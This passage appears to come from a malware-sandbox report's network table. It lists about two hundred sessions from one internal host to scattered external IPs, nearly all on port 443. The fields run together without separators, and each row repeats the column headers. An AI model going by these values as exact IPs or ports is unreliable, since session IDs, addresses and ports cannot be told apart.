                                                      20030192.168.2.143521844.235.253.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20031192.168.2.1444340222.100.236.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20032192.168.2.1454414107.128.147.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20033192.168.2.145452434.115.143.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20034192.168.2.1443762221.170.212.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20035192.168.2.146080895.219.252.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20036192.168.2.1452364198.99.121.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20037192.168.2.1444352103.141.118.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20038192.168.2.143660278.176.65.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20039192.168.2.1452132170.42.218.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20040192.168.2.1446376128.94.2.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20041192.168.2.1435788169.53.250.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20042192.168.2.144727235.163.163.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20043192.168.2.1455904113.87.59.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20044192.168.2.145673469.73.225.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20045192.168.2.1449028124.187.51.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20046192.168.2.1460830178.97.141.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20047192.168.2.143365667.68.183.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20048192.168.2.143810052.133.119.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20049192.168.2.145517264.242.188.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20050192.168.2.145164495.245.204.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20051192.168.2.1455396145.176.235.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20052192.168.2.146060264.15.167.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20053192.168.2.143947836.204.131.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20054192.168.2.1447444141.61.176.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20055192.168.2.145871849.35.45.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20056192.168.2.1459516139.210.160.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20057192.168.2.143518820.185.227.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20058192.168.2.1449120143.203.118.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20059192.168.2.144822697.207.172.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20060192.168.2.1444480131.12.254.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20061192.168.2.1441412150.142.133.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20062192.168.2.144957291.239.139.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20063192.168.2.143562832.141.160.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20064192.168.2.1439332191.48.218.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20065192.168.2.1444102131.35.88.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20066192.168.2.143949891.171.51.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20067192.168.2.144304066.198.103.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20068192.168.2.1437644183.10.142.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20069192.168.2.145505643.180.255.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20070192.168.2.1443006116.203.75.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20071192.168.2.1450036192.21.145.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20072192.168.2.144749214.30.46.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20073192.168.2.144736464.55.179.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20074192.168.2.144803662.109.56.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20075192.168.2.1460894150.81.168.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20076192.168.2.1459506134.205.11.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20077192.168.2.143297258.197.74.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20078192.168.2.143420094.81.110.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20079192.168.2.1454966168.208.175.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20080192.168.2.1442410140.33.141.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20081192.168.2.1456686150.207.84.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20082192.168.2.1446182113.191.142.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20083192.168.2.143310218.28.221.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20084192.168.2.1435120184.168.72.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20085192.168.2.1443352213.89.134.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20086192.168.2.143869648.241.24.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20087192.168.2.1440862102.227.9.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20088192.168.2.1454146113.8.249.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20089192.168.2.1433744131.249.216.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20090192.168.2.145495677.132.205.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20091192.168.2.144601696.206.119.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20092192.168.2.1455544124.251.10.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20093192.168.2.144828489.172.251.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20094192.168.2.14446708.128.182.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20095192.168.2.143939690.121.111.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20096192.168.2.1454212105.67.141.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20097192.168.2.1438632159.26.64.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20098192.168.2.1447916134.175.99.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20099192.168.2.145410077.157.83.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20100192.168.2.143476888.24.89.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20101192.168.2.1455886129.29.94.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20102192.168.2.1459650151.35.171.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20103192.168.2.1442498140.163.156.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20104192.168.2.1440530143.27.182.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20105192.168.2.143825691.117.41.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20106192.168.2.1442846190.16.75.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20107192.168.2.144161495.15.220.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20108192.168.2.1443696140.255.207.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20109192.168.2.1456444113.240.71.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20110192.168.2.1450036114.117.231.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20111192.168.2.145336265.176.28.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20112192.168.2.1460940163.245.81.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20113192.168.2.1458258167.121.73.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20114192.168.2.145010836.243.187.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20115192.168.2.1437518131.139.31.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20116192.168.2.1459500174.83.56.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20117192.168.2.14591268.180.183.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20118192.168.2.144071872.192.239.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20119192.168.2.1453272113.174.254.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20120192.168.2.1459170179.68.169.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20121192.168.2.1446554165.227.229.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20122192.168.2.1454174200.237.97.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20123192.168.2.1448674178.112.14.2558080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20124192.168.2.1435876167.227.255.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20125192.168.2.1456356154.164.148.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20126192.168.2.1433146188.35.112.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20127192.168.2.1449618134.234.52.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20128192.168.2.1457108156.247.165.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20129192.168.2.1450882221.141.154.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20130192.168.2.1447802153.221.104.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20131192.168.2.1459960136.80.94.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20132192.168.2.1454548147.183.31.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20133192.168.2.1443766108.13.222.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20134192.168.2.1442600171.237.220.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20135192.168.2.1440628189.58.78.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20136192.168.2.1433352205.207.255.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20137192.168.2.1436066197.84.189.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20138192.168.2.1433250189.168.66.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20139192.168.2.1454564188.128.73.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20140192.168.2.144761461.103.209.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20141192.168.2.145169282.86.239.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20142192.168.2.143916881.51.40.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20143192.168.2.1448994100.210.185.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20144192.168.2.144972023.6.26.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20145192.168.2.145534643.130.87.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20146192.168.2.143473452.192.15.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20147192.168.2.145762084.3.209.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20148192.168.2.1440228189.83.117.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20149192.168.2.1438580177.132.108.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20150192.168.2.144474865.209.182.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20151192.168.2.1436080206.201.54.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20152192.168.2.145881652.121.124.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20153192.168.2.144506464.61.5.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20154192.168.2.143830212.114.46.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20155192.168.2.1447852129.182.36.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20156192.168.2.144936427.236.207.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20157192.168.2.1439140144.63.87.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20158192.168.2.145319472.42.88.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20159192.168.2.145677291.183.62.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20160192.168.2.1450276139.5.253.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20161192.168.2.1456446160.130.94.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20162192.168.2.1460860115.38.247.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20163192.168.2.1455006102.85.222.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20164192.168.2.1457764162.159.236.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20165192.168.2.1444426128.18.216.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20166192.168.2.14467628.253.176.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20167192.168.2.1440534123.30.168.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20168192.168.2.1449492161.57.96.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20169192.168.2.1438784134.89.154.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20170192.168.2.143732678.224.70.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20171192.168.2.1447382185.240.176.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20172192.168.2.1446574151.66.224.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20173192.168.2.1440056198.77.10.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20174192.168.2.145914076.206.31.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20175192.168.2.143357658.188.171.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20176192.168.2.1448428142.122.152.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20177192.168.2.1457924148.50.47.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20178192.168.2.1437636175.25.102.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20179192.168.2.144520498.180.116.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20180192.168.2.1452048169.136.234.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20181192.168.2.1456798138.52.57.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20182192.168.2.1456180101.193.183.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20183192.168.2.1438962212.25.140.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20184192.168.2.1447318150.231.226.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20185192.168.2.143789042.234.18.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20186192.168.2.144384045.7.188.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20187192.168.2.1437520180.142.72.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20188192.168.2.1460136126.186.249.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20189192.168.2.1440142182.39.86.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20190192.168.2.1442442136.155.37.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20191192.168.2.1444614171.212.221.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20192192.168.2.1446908121.138.243.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20193192.168.2.1446014176.19.26.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20194192.168.2.145208085.97.130.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20195192.168.2.1450120126.182.150.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20196192.168.2.145735692.94.33.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20197192.168.2.1437642163.85.28.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20198192.168.2.145323875.241.166.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20199192.168.2.1433794151.210.107.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20200192.168.2.143449832.41.16.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20201192.168.2.14506882.174.98.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20202192.168.2.1438104160.27.128.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20203192.168.2.143556218.237.3.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20204192.168.2.144265084.44.84.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20205192.168.2.1435362189.98.142.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20206192.168.2.1438424110.93.253.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20207192.168.2.1452548145.146.26.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20208192.168.2.145617044.228.155.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20209192.168.2.1445940115.97.70.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20210192.168.2.1440148186.238.168.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20211192.168.2.1449926213.155.51.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20212192.168.2.1436636158.109.156.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20213192.168.2.145896869.133.186.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20214192.168.2.144571665.50.172.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20215192.168.2.1450366182.86.27.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20216192.168.2.1460174162.40.72.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20217192.168.2.1451766147.196.141.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20218192.168.2.14514302.58.230.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20219192.168.2.1439680199.172.226.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20220192.168.2.145885624.152.169.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20221192.168.2.1446994109.222.12.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20222192.168.2.145877420.27.130.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20223192.168.2.144435696.76.194.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20224192.168.2.144234868.135.197.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20225192.168.2.1447402184.171.221.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20226192.168.2.1457810197.236.171.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20227192.168.2.1452650138.129.11.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20228192.168.2.1459758207.117.104.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20229192.168.2.1448074108.91.122.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20230192.168.2.1453396168.53.98.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20231192.168.2.143765887.192.4.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20232192.168.2.1460498202.184.94.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20233192.168.2.1450268188.160.197.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20234192.168.2.1449616123.46.230.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20235192.168.2.145471848.215.254.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20236192.168.2.145385635.206.165.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20237192.168.2.1437016170.153.201.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20238192.168.2.145362098.26.106.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20239192.168.2.144973063.63.251.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20240192.168.2.145140098.185.34.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20241192.168.2.14521221.174.85.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20242192.168.2.14551941.58.149.188443
